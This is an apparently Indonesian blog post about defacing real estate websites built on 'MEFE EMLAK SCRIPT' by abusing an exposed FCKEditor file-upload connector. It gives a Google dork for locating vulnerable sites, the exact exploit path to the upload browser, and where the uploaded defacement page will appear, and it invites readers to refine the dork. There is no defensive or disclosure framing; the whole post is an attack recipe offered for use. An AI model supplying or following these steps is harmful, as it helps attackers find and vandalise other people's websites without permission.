Deface menggunakan FCKEditor Vulnerability

Author : KaCaK
HomePage : http://www.griadamlar.com
Web App.Name : MEFE EMLAK SCRIPT
Price : N/A
Version : N/A
Software: http://emlak.mefe.net/
Vulnerability Style : File Upload
Bug : File Upload
Google Keyword ( Dork ) : inurl:advert_detail.php?id=
Dork bisa kembangin dengan otak v*kep kalian 😀

exploit: /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

hasil defacean kita ada di

http://www.site.com/files ( kalo lu rename script pepesan lu jadi index.html)
http://www.site.com/files/namascriptlu.html ( kalo lu rename script pepesan lu bebas,contoh ikkeh.html )

via:cowokerensteam

Tinggalkan komentar